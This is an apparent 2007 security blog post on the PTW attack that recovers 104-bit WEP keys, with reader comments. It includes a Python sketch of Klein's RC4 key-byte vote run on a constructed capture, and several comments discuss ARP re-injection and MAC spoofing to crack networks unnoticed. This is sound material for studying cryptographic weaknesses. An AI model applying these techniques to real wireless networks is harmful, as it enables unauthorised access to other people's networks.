Breaking WEP in Under a Minute

WEP (Wired Equivalent Privacy) is the original encryption protocol for 802.11 wireless networks. It has long been known to be insecure and has been replaced by WPA (Wi-Fi Protected Access), but it is still widely deployed.

This paper, “Breaking 104 bit WEP in less than 60 seconds,” describes the best attack against WEP to date:

Abstract:

We demonstrate an active attack on the WEP protocol that is able to recover a 104-bit WEP key using less than 40,000 frames with a success probability of 50%. In order to succeed in 95% of all cases, 85,000 packets are needed. The IV of these packets can be randomly chosen. This is an improvement in the number of required frames by more than an order of magnitude over the best known key-recovery attacks for WEP. On an IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute. The required computational effort is approximately 2^20 RC4 key setups, which on current desktop and laptop CPUs is negligible.
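The attack in the paper builds on Klein's correlation in RC4's key schedule, and WEP hands an attacker exactly what that correlation needs: the first three bytes of every per-packet key (the cleartext IV) and the first keystream bytes (every data frame starts with the LLC/SNAP header AA AA 03, so XORing it with the ciphertext recovers keystream). The following Python sketch is an added illustration, not code from the paper or from any WEP tool. It constructs its own "capture" (a random 104-bit root key, random IVs, ICV omitted) and runs Klein's vote for the first unknown key byte, K[3]; the paper's contribution is to extend this so the remaining bytes can be attacked in parallel rather than one after another.

```python
# Added example: Klein's key-byte correlation against WEP's RC4 setup, the
# building block the PTW attack extends. Everything below is constructed for
# illustration (random root key, random IVs, CRC-32 ICV omitted); it is not
# the paper's code and not a real capture.
import random

N = 256
# Every WEP data frame carries an IP or ARP payload, so its plaintext starts
# with the LLC/SNAP header AA AA 03. XORing those bytes with the ciphertext
# yields the first three keystream bytes of each frame for free.
SNAP_HEADER = bytes([0xAA, 0xAA, 0x03])


def rc4_ksa(key, steps=N):
    """Run the first `steps` rounds of the RC4 key schedule; return (S, j)."""
    S = list(range(N))
    j = 0
    klen = len(key)
    for i in range(steps):
        j = (j + S[i] + key[i % klen]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, nbytes):
    """Standard RC4: full KSA, then `nbytes` bytes of PRGA output."""
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(nbytes):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(root_key, iv, plaintext):
    """WEP body: cleartext 3-byte IV, then plaintext XOR RC4(IV || root key).
    The CRC-32 ICV that follows the payload is omitted; it is not needed here."""
    ks = rc4_keystream(iv + root_key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def keystream_from_frame(frame):
    """Known-plaintext recovery: the three ciphertext bytes after the IV,
    XORed with the SNAP header, are keystream bytes X[0..2]."""
    return bytes(c ^ p for c, p in zip(frame[3:6], SNAP_HEADER))


def klein_candidate(known_prefix, keystream, i):
    """Klein's guess for K[i] given K[0..i-1] and keystream byte X[i-1].

    After i KSA rounds the state is (S_i, j_i). With probability about
    1.36/256 (instead of 1/256 for a random guess) the relation
        K[i] = S_i^{-1}[i - X[i-1]] - j_i - S_i[i]   (mod 256)
    holds, so tallying this value over many IVs makes the true byte win.
    """
    S, j = rc4_ksa(known_prefix, steps=i)
    pos = S.index((i - keystream[i - 1]) & 0xFF)   # S_i^{-1}[i - X[i-1]]
    return (pos - j - S[i]) & 0xFF


def rank_key_byte(frames, i=3):
    """Vote over all frames for K[i]; for i == 3 the known prefix is the IV.
    Returns candidate bytes ordered best first, plus the raw vote counts."""
    votes = [0] * N
    for frame in frames:
        votes[klein_candidate(frame[:3], keystream_from_frame(frame), i)] += 1
    ranked = sorted(range(N), key=lambda b: votes[b], reverse=True)
    return ranked, votes


def simulate(n_frames, seed=1):
    """Constructed capture: random 104-bit root key, random IVs, SNAP payload."""
    rng = random.Random(seed)
    root_key = bytes(rng.randrange(N) for _ in range(13))
    frames = [wep_encrypt(root_key, bytes(rng.randrange(N) for _ in range(3)),
                          SNAP_HEADER) for _ in range(n_frames)]
    ranked, votes = rank_key_byte(frames)
    return root_key, ranked, votes


if __name__ == "__main__":
    root_key, ranked, votes = simulate(80_000)
    true_byte = root_key[0]                      # K[3] of the per-packet key
    print(f"true K[3]=0x{true_byte:02x} votes={votes[true_byte]} "
          f"rank={ranked.index(true_byte) + 1}; best guess 0x{ranked[0]:02x} "
          f"votes={votes[ranked[0]]}; a uniform byte would get {80_000 / N:.0f}")
```

With tens of thousands of frames the true byte normally ranks first; when it does not, it is within the first few, which is why the paper pairs the votes with key ranking (trying the top candidates) rather than trusting the single best guess. Recovering K[4] onwards in this sequential form means re-running the vote with the IV plus the bytes already recovered as the known prefix, which is the step the paper's attack avoids.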

Posted on April 4, 2007 at 12:46 PM

Comments

MyCat April 4, 2007 1:05 PM

“The required computational effort is approximately 220 RC4 key setups”

That’s 2 to the 20th power in the paper. While a million is still a very small number of key setups, it’s still a lot more than 220.

David April 4, 2007 1:13 PM

I have problems with them saying that it would take a minute. The specific issue I have is gathering the 85,000 packets (to assure a crack at 90+%).

Unless you are forcing replies from the source, you can’t sniff 80,000 packets in a minute. Heck, I can’t get 85,000 packets from a 100 Mbps connection without forcing replies.

We’ve seen wireless connections that are active all day (being used) with less than 80,000 packets.

The cracking of the key can probably be done in less than a minute, but getting the data can’t be done that easily.

Josquin April 4, 2007 1:19 PM

“On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute.”

There is how you get the appropriate number of frames.

Aaron April 4, 2007 1:28 PM

“On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute.”

This captures an ARP request packet and repeatedly re-sends it, generating up to 3 new packets to capture. On my system ARP requests are 42 bytes and replies are 60 bytes so you could generate 85000 packets with 8.7MB of data xferred if you get one arp reply packet per arp sent. That’ll be more than one second on 802.11g but less than two seconds probably.

Anonymous April 4, 2007 2:34 PM

Is there any practical software available using this method yet? Is there any planned?

Dan April 4, 2007 3:07 PM

@David:
It’s way too easy with the right tools and right wireless card. I don’t think I should necessarily mention them here, but they aren’t hard to find.

FooDoo April 4, 2007 4:09 PM

There was a talk at Shmoocon ’07 re: cracking WEP using sniffed packets and FPGAs (specialized circuit boards).

Anonymous Pilot April 4, 2007 4:52 PM

Remember what Bruce said: be careful in designing a cryptographic system, it will be in use for a long fscking time.

The Anonymous Pilot

David April 4, 2007 5:30 PM

I’m very familiar with forcing traffic and creating traffic, there are a ton of tools to do this.

What I was referring to was “passively” sniffing 85,000 frames.

Any time you inject packets something of yours is detectable, possibly the OS, the tool, etc.

If you want to crack it without letting anyone know, you need to do this “passively”, and 85,000 packets is a long time when you are doing that.

You guys are like the bank robbers that are blowing up ATMs. Sure you get the money, but you leave a ton of evidence behind….. Not so good, IMHO.

Woody April 4, 2007 6:12 PM

@David

If the goal is to crack a home network from the curb, who’s going to be monitoring the wireless network for a flood of ARPs?

Even with a corporate network, is an attack of this sort likely to be noticed? Running a spoofed MAC ID and pounding the network for say 5-10 seconds (to spread it out a bit), is anyone going to notice that host A seemed excessively curious about host B (at the ARP level, not at the IP firewall level)?

Thomas April 4, 2007 8:24 PM

@David,
“””Any time you inject packets something of yours is detectable, possibly the OS, the tool, etc.”””

I doubt that anyone still using WEP is going to be collecting, much less looking at, this sort of stuff.

jose April 4, 2007 9:58 PM

Well, that is old news, but it comes worse to the people; just change the system and go up to the Internet.

Samy April 4, 2007 10:41 PM

Well, just for the record … I live in Mexico, and it is VERY HARD to find a WPA secured network here … It is either open, or WEP :-o. Call it paradise 😉

A.Person from the UK April 5, 2007 3:18 AM

In the paper they mention that looking at sites around Germany they found many still using WEP. In the UK there are many home networks with no encryption and many that use WEP, as it’s the next choice on the list after none.

Warez April 5, 2007 4:10 AM

@Anonymous,

Good, when the music police come knocking down my door I’ll say it was you 😉

Rick April 5, 2007 10:07 AM

@Warez

but he lied, he did not “do my best to secure this”, he deliberately removed all security. I agree it is a useful letter but, as we now know that any wireless security is at best a delay, he may as well leave it switched on and not lie.

Greg April 5, 2007 11:38 AM

@Rick
The intended letter reads “I will do my best to secure this”, meaning that he will try and sort the problem out after he was informed of the infringement not that it was already secured.

K. Signal Eingang April 5, 2007 2:44 PM

I use WEP at home and will probably continue to for some time, for several reasons:

First, WEP is enough to keep the casual bandwidth poachers away, and my apartment building alone has at least two completely unsecured networks running, so I doubt anyone’s going to make much of an effort to crack mine.

Second, I’ve got other controls – my wireless network is isolated from my desktop PCs by a firewall, so even if somebody finds my SSID, cracks my WEP key and hops on the network, they’re not going to do anything more serious than leech a few kbps of bandwidth.

Finally and most importantly, the Nintendo DS doesn’t support WPA. And I gots to have my Mario Kart!

Anony. Europe April 6, 2007 12:50 AM

A short but interesting note to those people who take the “better not secure WLAN at all” stand:
in some European countries court decisions have pointed out that the person owning the access point is responsible for proper security. Neglecting this can result in liability for misuse of the access point, including illegal downloads tracked down by IP, hacking etc.
–> very bad idea not to secure wireless LAN properly, at least in Europe, you might as well shoot your own leg
Happy Easter

Abruzzi September 18, 2007 6:21 PM

Just simply, I do not see anything new in that PDF :(, only collected information put together…
